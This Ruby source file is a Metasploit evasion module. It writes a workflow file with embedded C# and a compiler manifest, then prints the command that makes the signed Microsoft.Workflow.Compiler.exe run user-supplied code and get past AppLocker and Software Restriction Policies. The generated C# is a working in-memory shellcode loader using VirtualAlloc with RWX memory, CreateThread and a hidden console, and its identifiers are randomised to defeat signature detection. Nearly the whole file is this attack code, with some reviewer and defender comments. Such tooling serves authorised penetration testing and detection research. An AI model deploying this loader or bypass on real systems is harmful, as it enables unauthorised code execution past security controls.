##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Evasion module that writes two files locally -- a .xoml workflow whose
# embedded C# carries the payload, and the .xml CompilerInput manifest that
# names it -- for Microsoft.Workflow.Compiler.exe to compile and run.
# #run only creates the files and prints instructions; the module itself
# performs no action against a target.
class MetasploitModule < Msf::Evasion

  # Module metadata and options.
  #
  # The generic FILENAME option is deregistered because this module produces
  # two files and names them through XOML_FILE and XML_FILE instead
  # (see #file_format_filename and #create_files).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Applocker Evasion - Microsoft Workflow Compiler',
        'Description' => %q{
          This module will assist you in evading Microsoft
          Windows Applocker and Software Restriction Policies.
          This technique utilises the Microsoft signed binaries
          Microsoft.Workflow.Compiler.exe to execute user supplied code.
        },
        'Author' => [
          'Nick Tyrer <@NickTyrer>', # module development
          'Matt Graeber' # workflow_compiler bypass research
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [['Microsoft Windows', {}]],
        'References' => [
          ['URL', 'https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb']
        ]
      )
    )

    register_options(
      [
        OptString.new('XOML_FILE', [true, 'Filename for the .xoml file (default: workflow.xoml)', 'workflow.xoml']),
        OptString.new('XML_FILE', [true, 'Filename for the .xml file (default: workflow.xml)', 'workflow.xml'])
      ]
    )

    deregister_options('FILENAME')
  end

  # Base64-encodes the encoded payload so it can be embedded as a C# string
  # literal in the .xoml file (see #workflow_xoml).
  #
  # @return [String] Base64 text of payload.encoded
  def build_payload
    Rex::Text.encode_base64(payload.encoded)
  end

  # Returns 8 random alphabetic characters; every identifier in the generated
  # C# is drawn from this so the file differs on each run.
  #
  # NOTE(review): each call is independent, so two of the 13 draws made in
  # #workflow_xoml could (rarely) coincide and yield duplicate C# identifiers.
  #
  # @return [String]
  def obfu
    Rex::Text.rand_text_alpha 8
  end

  # Builds the .xoml file: a SequentialWorkflowActivity whose <x:Code> block
  # holds a C# class. The class constructor calls a static method that hides
  # the console window (GetConsoleWindow / ShowWindow with 0, i.e. SW_HIDE),
  # Base64-decodes the embedded payload, copies it into memory obtained from
  # VirtualAlloc with 0x1000 (MEM_COMMIT) and 0x40 (PAGE_EXECUTE_READWRITE),
  # starts it with CreateThread and then blocks in WaitForSingleObject with
  # timeout 0xFFFFFFFF (INFINITE). Class, method, variable and constant names
  # all come from `mod`; the same index is reused wherever one name must match
  # (e.g. mod[3] for the window handle, mod[10] for the thread-id argument).
  #
  # Defender note: an RWX allocation followed directly by Marshal.Copy and
  # CreateThread is the in-memory loader shape that memory-scanning and
  # API-sequence detections commonly look for.
  #
  # @return [String] the .xoml file content
  def workflow_xoml
    esc = build_payload
    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]
    <<~HEREDOC
      <SequentialWorkflowActivity x:Class="#{mod[0]}" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
      <x:Code><![CDATA[
      public class #{mod[1]} : SequentialWorkflowActivity
      {
      public #{mod[1]}()
      {
      #{mod[2]}();
      }
      public static void #{mod[2]}()
      {
      IntPtr #{mod[3]};
      #{mod[3]} = GetConsoleWindow();
      ShowWindow(#{mod[3]}, #{mod[4]});
      string #{mod[5]} = "#{esc}";
      byte[] #{mod[6]} = Convert.FromBase64String(#{mod[5]});
      byte[] #{mod[7]} = #{mod[6]};
      IntPtr #{mod[8]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[7]}.Length, #{mod[12]}, #{mod[9]});
      System.Runtime.InteropServices.Marshal.Copy(#{mod[7]}, 0, #{mod[8]}, #{mod[7]}.Length);
      IntPtr #{mod[10]} = IntPtr.Zero;
      WaitForSingleObject(CreateThread(#{mod[10]}, UIntPtr.Zero, #{mod[8]}, #{mod[10]}, 0, ref #{mod[10]}), #{mod[11]});
      }
      private static Int32 #{mod[12]}=0x1000;
      private static IntPtr #{mod[9]}=(IntPtr)0x40;
      private static UInt32 #{mod[11]} = 0xFFFFFFFF;
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr #{mod[10]});
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
      [System.Runtime.InteropServices.DllImport("user32.dll")]
      static extern bool ShowWindow(IntPtr #{mod[3]}, int nCmdShow);
      [System.Runtime.InteropServices.DllImport("Kernel32")]
      private static extern IntPtr GetConsoleWindow();
      const int #{mod[4]} = 0;
      }
      ]]></x:Code>
      </SequentialWorkflowActivity>
    HEREDOC
  end

  # Builds the CompilerInput manifest consumed by Microsoft.Workflow.Compiler.exe.
  # <files> names the .xoml written by #create_files; the name is read from the
  # datastore, so this must be called after #create_files has fixed up the
  # extension. languageToUse is CSharp, generateInMemory is true and
  # generateExecutable is false, so the compiled assembly is presumably kept
  # in memory only -- confirm against the compiler's documentation.
  #
  # @return [String] the .xml file content
  def workflow_xml
    <<~HEREDOC
      <?xml version="1.0" encoding="utf-8"?>
      <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
      <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
      <d2p1:string>#{datastore['XOML_FILE']}</d2p1:string>
      </files>
      <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
      <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
      <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
      <generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
      <includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
      <linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
      <tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
      <warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
      <win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
      <d2p1:checkTypes>false</d2p1:checkTypes>
      <d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
      <d2p1:compilerOptions i:nil="true" />
      <d2p1:generateCCU>false</d2p1:generateCCU>
      <d2p1:languageToUse>CSharp</d2p1:languageToUse>
      <d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
      <d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
      <d2p1:mtInfo i:nil="true" />
      <d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
      </parameters>
      </CompilerInput>
    HEREDOC
  end

  # Getter/setter for the name used by file_create. With no argument (or '')
  # it returns the current name; otherwise it records and returns the new
  # one (the assignment binds inside the else branch of the ternary).
  # Appears to replace the FILENAME-based hook the Evasion mixin would
  # otherwise use, since FILENAME is deregistered in #initialize -- confirm
  # against Msf::Evasion.
  #
  # @param name [String] filename to record, or '' to read the current one
  # @return [String, nil] the recorded filename
  def file_format_filename(name = '')
    name.empty? ? @fname : @fname = name
  end

  # Writes the .xoml file and then the .xml file, switching the name reported
  # by #file_format_filename before each file_create call.
  def create_files
    # Fall back to the default names when an option is blank and force the
    # expected extension. NOTE: `<<` appends in place, so when the option
    # value is used the datastore string itself is modified; that is what
    # keeps the names printed by #instructions in step with the files written,
    # and it would raise FrozenError if the datastore ever returned a frozen
    # string.
    f1 = datastore['XOML_FILE'].empty? ? 'workflow.xoml' : datastore['XOML_FILE']
    f1 << '.xoml' unless f1.downcase.end_with?('.xoml')
    f2 = datastore['XML_FILE'].empty? ? 'workflow.xml' : datastore['XML_FILE']
    f2 << '.xml' unless f2.downcase.end_with?('.xml')
    # Build the contents only now: #workflow_xml reads datastore['XOML_FILE'],
    # which the extension fix above may have changed.
    xoml_file = workflow_xoml
    xml_file = workflow_xml
    file_format_filename(f1)
    file_create(xoml_file)
    file_format_filename(f2)
    file_create(xml_file)
  end

  # Prints where to place the two files and the Microsoft.Workflow.Compiler.exe
  # command line, choosing the 32-bit Framework path for x86 payloads and
  # Framework64 otherwise. The trailing argument is three random letters;
  # presumably the output-file argument the compiler expects -- confirm
  # against the referenced post.
  def instructions
    print_status "Copy #{datastore['XOML_FILE']} and #{datastore['XML_FILE']} to the target"
    if payload.arch.first == ARCH_X86
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\Microsoft.Workflow.Compiler.exe #{datastore['XML_FILE']} #{Rex::Text.rand_text_alpha 3}"
    else
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\Microsoft.Workflow.Compiler.exe #{datastore['XML_FILE']} #{Rex::Text.rand_text_alpha 3}"
    end
  end

  # Module entry point: write the files, then print the usage instructions.
  def run
    create_files
    instructions
  end
end